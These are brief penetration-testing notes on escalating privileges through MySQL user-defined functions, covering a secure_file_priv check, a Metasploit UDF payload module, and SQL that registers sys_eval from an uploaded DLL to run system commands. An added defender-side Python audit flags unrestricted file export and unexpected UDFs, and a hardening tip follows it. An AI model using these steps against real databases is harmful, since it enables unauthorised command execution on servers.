UDF privilege escalation notes

MySQL must have file import/export permission (check secure_file_priv):

show global variables like '%secure%';
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+
2 rows in set (0.00 sec)

msf exploit(multi/mysql/mysql_udf_payload)

Check the name of the uploaded DLL

select * from mysql.func where name = "sys_exec";

Create a command-execution function from the DLL uploaded by msf

create function sys_eval returns string soname "xxxx.dll";
select sys_eval("whoami");
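
Added example (not part of the original notes): a defender-side audit in Python of the two query outputs shown above. It reports whether secure_file_priv leaves file import/export unrestricted and lists UDFs registered in mysql.func that are not on an allowlist. The mysql.func sample rows and the allowlist parameter are constructed assumptions.

```python
# Added example: audit mysql CLI table output for the conditions in these notes.

# Constructed sample input, shaped like the SHOW GLOBAL VARIABLES output above.
VARS_OUTPUT = """\
+------------------+-------+
| Variable_name    | Value |
+------------------+-------+
| secure_auth      | OFF   |
| secure_file_priv |       |
+------------------+-------+
"""

# Constructed sample of `select * from mysql.func;` (dl is the notes' placeholder name).
FUNC_OUTPUT = """\
+----------+-----+----------+----------+
| name     | ret | dl       | type     |
+----------+-----+----------+----------+
| sys_exec |   2 | xxxx.dll | function |
+----------+-----+----------+----------+
"""

def parse_table(text):
    """Parse mysql CLI box-table output into a list of row dicts."""
    rows = [[cell.strip() for cell in line.strip()[1:-1].split("|")]
            for line in text.splitlines() if line.strip().startswith("|")]
    if not rows:
        return []
    header, body = rows[0], rows[1:]
    return [dict(zip(header, row)) for row in body]

def audit_file_priv(vars_text):
    """Empty value = unrestricted, NULL = import/export disabled, else one directory."""
    values = {r["Variable_name"]: r["Value"] for r in parse_table(vars_text)}
    if "secure_file_priv" not in values:
        return "unknown"
    value = values["secure_file_priv"]
    if value == "":
        return "unrestricted"
    if value.upper() == "NULL":
        return "disabled"
    return "restricted:" + value

def audit_udfs(func_text, allowlist=()):
    """Return (name, library) for every registered UDF not on the allowlist."""
    return [(r["name"], r["dl"]) for r in parse_table(func_text)
            if r["name"] not in allowlist]

if __name__ == "__main__":
    print("secure_file_priv:", audit_file_priv(VARS_OUTPUT))
    print("unexpected UDFs:", audit_udfs(FUNC_OUTPUT))
```

An "unrestricted" result or any unexpected row in mysql.func is worth investigating; setting secure_file_priv to NULL or to a dedicated directory in the server configuration removes the precondition noted at the top.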